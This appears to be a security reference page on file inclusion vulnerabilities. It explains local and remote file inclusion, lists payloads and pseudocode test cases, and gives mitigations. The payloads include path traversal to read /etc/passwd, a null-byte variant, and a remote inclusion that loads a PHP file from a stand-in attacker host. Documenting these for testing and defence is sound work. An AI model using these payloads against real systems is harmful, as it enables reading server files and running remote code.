File Inclusion
Description
File Inclusion occurs when a web application includes files based on user input without proper validation. This can lead to arbitrary file inclusion, allowing attackers to read sensitive files or execute arbitrary code.
Example with Scenario
Scenario: A web application dynamically includes a file based on a URL parameter. An attacker can manipulate the parameter to include sensitive files from the server.
Payloads and Test Cases
Payloads
Local File Inclusion (LFI):
/include?file=../../../../etc/passwd
Remote File Inclusion (RFI):
/include?file=http://attacker.com/malicious.php
Null Byte Injection:
/include?file=../../../../etc/passwd%00
Test Cases
Local File Inclusion (LFI):
Payload:
/include?file=../../../../etc/passwd
Test Case:
# Send payload to the server sendPayloadToServer("/include?file=../../../../etc/passwd") # Verify if the application includes the /etc/passwd file checkFileInclusion("/etc/passwd")
Remote File Inclusion (RFI):
Payload:
/include?file=http://attacker.com/malicious.php
Test Case:
# Send payload to the server sendPayloadToServer("/include?file=http://attacker.com/malicious.php") # Verify if the application includes the remote file checkRemoteFileInclusion("http://attacker.com/malicious.php")
Null Byte Injection:
Payload:
/include?file=../../../../etc/passwd%00
Test Case:
# Send payload to the server sendPayloadToServer("/include?file=../../../../etc/passwd%00") # Verify if the application includes the /etc/passwd file despite null byte checkFileInclusion("/etc/passwd")
Mitigation
Input Validation:
Validate and sanitize user input to ensure it does not contain malicious paths.
Use allow-lists to restrict input to expected file paths.
Disable Dynamic Inclusion:
Avoid using dynamic file inclusion based on user input.
Use static file paths or mapped identifiers for inclusion.
Limit File Access:
Restrict file access permissions to only necessary files.
Use chroot or containerization to limit file system exposure.
Error Handling:
Implement proper error handling to avoid revealing file system structure.
Return generic error messages without disclosing sensitive information.
Last updated